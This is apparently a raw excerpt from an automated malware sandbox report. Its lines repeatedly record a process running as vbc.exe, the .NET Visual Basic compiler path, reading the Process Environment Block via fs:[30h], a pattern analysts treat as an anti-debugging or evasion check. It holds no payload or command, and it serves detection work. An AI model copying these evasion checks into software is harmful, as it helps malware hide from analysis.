Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539C720 mov eax, dword ptr fs:[00000030h]	13_2_0539C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539C720 mov eax, dword ptr fs:[00000030h]	13_2_0539C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05360710 mov eax, dword ptr fs:[00000030h]	13_2_05360710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539F71F mov eax, dword ptr fs:[00000030h]	13_2_0539F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539F71F mov eax, dword ptr fs:[00000030h]	13_2_0539F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05390710 mov eax, dword ptr fs:[00000030h]	13_2_05390710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05365702 mov eax, dword ptr fs:[00000030h]	13_2_05365702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05365702 mov eax, dword ptr fs:[00000030h]	13_2_05365702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05367703 mov eax, dword ptr fs:[00000030h]	13_2_05367703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539C700 mov eax, dword ptr fs:[00000030h]	13_2_0539C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05368770 mov eax, dword ptr fs:[00000030h]	13_2_05368770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770 mov eax, dword ptr fs:[00000030h]	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B765 mov eax, dword ptr fs:[00000030h]	13_2_0535B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B765 mov eax, dword ptr fs:[00000030h]	13_2_0535B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B765 mov eax, dword ptr fs:[00000030h]	13_2_0535B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B765 mov eax, dword ptr fs:[00000030h]	13_2_0535B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05360750 mov eax, dword ptr fs:[00000030h]	13_2_05360750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542972B mov eax, dword ptr fs:[00000030h]	13_2_0542972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2750 mov eax, dword ptr fs:[00000030h]	13_2_053A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2750 mov eax, dword ptr fs:[00000030h]	13_2_053A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E4755 mov eax, dword ptr fs:[00000030h]	13_2_053E4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541F72E mov eax, dword ptr fs:[00000030h]	13_2_0541F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539674D mov esi, dword ptr fs:[00000030h]	13_2_0539674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539674D mov eax, dword ptr fs:[00000030h]	13_2_0539674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539674D mov eax, dword ptr fs:[00000030h]	13_2_0539674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05373740 mov eax, dword ptr fs:[00000030h]	13_2_05373740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05373740 mov eax, dword ptr fs:[00000030h]	13_2_05373740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05373740 mov eax, dword ptr fs:[00000030h]	13_2_05373740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543B73C mov eax, dword ptr fs:[00000030h]	13_2_0543B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543B73C mov eax, dword ptr fs:[00000030h]	13_2_0543B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543B73C mov eax, dword ptr fs:[00000030h]	13_2_0543B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543B73C mov eax, dword ptr fs:[00000030h]	13_2_0543B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538D7B0 mov eax, dword ptr fs:[00000030h]	13_2_0538D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F7BA mov eax, dword ptr fs:[00000030h]	13_2_0535F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EF7AF mov eax, dword ptr fs:[00000030h]	13_2_053EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EF7AF mov eax, dword ptr fs:[00000030h]	13_2_053EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EF7AF mov eax, dword ptr fs:[00000030h]	13_2_053EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EF7AF mov eax, dword ptr fs:[00000030h]	13_2_053EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EF7AF mov eax, dword ptr fs:[00000030h]	13_2_053EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E97A9 mov eax, dword ptr fs:[00000030h]	13_2_053E97A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053607AF mov eax, dword ptr fs:[00000030h]	13_2_053607AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541F78A mov eax, dword ptr fs:[00000030h]	13_2_0541F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053647FB mov eax, dword ptr fs:[00000030h]	13_2_053647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053647FB mov eax, dword ptr fs:[00000030h]	13_2_053647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053827ED mov eax, dword ptr fs:[00000030h]	13_2_053827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053827ED mov eax, dword ptr fs:[00000030h]	13_2_053827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053827ED mov eax, dword ptr fs:[00000030h]	13_2_053827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D7E0 mov ecx, dword ptr fs:[00000030h]	13_2_0536D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054337B6 mov eax, dword ptr fs:[00000030h]	13_2_054337B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536C7C0 mov eax, dword ptr fs:[00000030h]	13_2_0536C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053657C0 mov eax, dword ptr fs:[00000030h]	13_2_053657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053657C0 mov eax, dword ptr fs:[00000030h]	13_2_053657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053657C0 mov eax, dword ptr fs:[00000030h]	13_2_053657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E07C3 mov eax, dword ptr fs:[00000030h]	13_2_053E07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537E627 mov eax, dword ptr fs:[00000030h]	13_2_0537E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F626 mov eax, dword ptr fs:[00000030h]	13_2_0535F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05396620 mov eax, dword ptr fs:[00000030h]	13_2_05396620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05398620 mov eax, dword ptr fs:[00000030h]	13_2_05398620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536262C mov eax, dword ptr fs:[00000030h]	13_2_0536262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05363616 mov eax, dword ptr fs:[00000030h]	13_2_05363616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05363616 mov eax, dword ptr fs:[00000030h]	13_2_05363616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2619 mov eax, dword ptr fs:[00000030h]	13_2_053A2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542866E mov eax, dword ptr fs:[00000030h]	13_2_0542866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542866E mov eax, dword ptr fs:[00000030h]	13_2_0542866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE609 mov eax, dword ptr fs:[00000030h]	13_2_053DE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539F603 mov eax, dword ptr fs:[00000030h]	13_2_0539F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537260B mov eax, dword ptr fs:[00000030h]	13_2_0537260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05391607 mov eax, dword ptr fs:[00000030h]	13_2_05391607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05392674 mov eax, dword ptr fs:[00000030h]	13_2_05392674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A660 mov eax, dword ptr fs:[00000030h]	13_2_0539A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A660 mov eax, dword ptr fs:[00000030h]	13_2_0539A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05399660 mov eax, dword ptr fs:[00000030h]	13_2_05399660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05399660 mov eax, dword ptr fs:[00000030h]	13_2_05399660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05435636 mov eax, dword ptr fs:[00000030h]	13_2_05435636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537C640 mov eax, dword ptr fs:[00000030h]	13_2_0537C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541F6C7 mov eax, dword ptr fs:[00000030h]	13_2_0541F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053576B2 mov eax, dword ptr fs:[00000030h]	13_2_053576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053576B2 mov eax, dword ptr fs:[00000030h]	13_2_053576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053576B2 mov eax, dword ptr fs:[00000030h]	13_2_053576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053966B0 mov eax, dword ptr fs:[00000030h]	13_2_053966B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054216CC mov eax, dword ptr fs:[00000030h]	13_2_054216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054216CC mov eax, dword ptr fs:[00000030h]	13_2_054216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054216CC mov eax, dword ptr fs:[00000030h]	13_2_054216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054216CC mov eax, dword ptr fs:[00000030h]	13_2_054216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535D6AA mov eax, dword ptr fs:[00000030h]	13_2_0535D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535D6AA mov eax, dword ptr fs:[00000030h]	13_2_0535D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539C6A6 mov eax, dword ptr fs:[00000030h]	13_2_0539C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05364690 mov eax, dword ptr fs:[00000030h]	13_2_05364690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05364690 mov eax, dword ptr fs:[00000030h]	13_2_05364690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541D6F0 mov eax, dword ptr fs:[00000030h]	13_2_0541D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E368C mov eax, dword ptr fs:[00000030h]	13_2_053E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E368C mov eax, dword ptr fs:[00000030h]	13_2_053E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E368C mov eax, dword ptr fs:[00000030h]	13_2_053E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E368C mov eax, dword ptr fs:[00000030h]	13_2_053E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE6F2 mov eax, dword ptr fs:[00000030h]	13_2_053DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE6F2 mov eax, dword ptr fs:[00000030h]	13_2_053DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE6F2 mov eax, dword ptr fs:[00000030h]	13_2_053DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DE6F2 mov eax, dword ptr fs:[00000030h]	13_2_053DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E06F1 mov eax, dword ptr fs:[00000030h]	13_2_053E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E06F1 mov eax, dword ptr fs:[00000030h]	13_2_053E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F36EE mov eax, dword ptr fs:[00000030h]	13_2_053F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F36EE mov eax, dword ptr fs:[00000030h]	13_2_053F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F36EE mov eax, dword ptr fs:[00000030h]	13_2_053F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F36EE mov eax, dword ptr fs:[00000030h]	13_2_053F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F36EE mov eax, dword ptr fs:[00000030h]	13_2_053F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F36EE mov eax, dword ptr fs:[00000030h]	13_2_053F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053936EF mov eax, dword ptr fs:[00000030h]	13_2_053936EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538D6E0 mov eax, dword ptr fs:[00000030h]	13_2_0538D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538D6E0 mov eax, dword ptr fs:[00000030h]	13_2_0538D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B6C0 mov eax, dword ptr fs:[00000030h]	13_2_0536B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B6C0 mov eax, dword ptr fs:[00000030h]	13_2_0536B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B6C0 mov eax, dword ptr fs:[00000030h]	13_2_0536B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B6C0 mov eax, dword ptr fs:[00000030h]	13_2_0536B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B6C0 mov eax, dword ptr fs:[00000030h]	13_2_0536B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B6C0 mov eax, dword ptr fs:[00000030h]	13_2_0536B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053916CF mov eax, dword ptr fs:[00000030h]	13_2_053916CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A6C7 mov ebx, dword ptr fs:[00000030h]	13_2_0539A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A6C7 mov eax, dword ptr fs:[00000030h]	13_2_0539A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B136 mov eax, dword ptr fs:[00000030h]	13_2_0535B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B136 mov eax, dword ptr fs:[00000030h]	13_2_0535B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B136 mov eax, dword ptr fs:[00000030h]	13_2_0535B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B136 mov eax, dword ptr fs:[00000030h]	13_2_0535B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361131 mov eax, dword ptr fs:[00000030h]	13_2_05361131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361131 mov eax, dword ptr fs:[00000030h]	13_2_05361131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05435152 mov eax, dword ptr fs:[00000030h]	13_2_05435152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05390124 mov eax, dword ptr fs:[00000030h]	13_2_05390124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F9179 mov eax, dword ptr fs:[00000030h]	13_2_053F9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172 mov eax, dword ptr fs:[00000030h]	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05420115 mov eax, dword ptr fs:[00000030h]	13_2_05420115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540A118 mov ecx, dword ptr fs:[00000030h]	13_2_0540A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540A118 mov eax, dword ptr fs:[00000030h]	13_2_0540A118
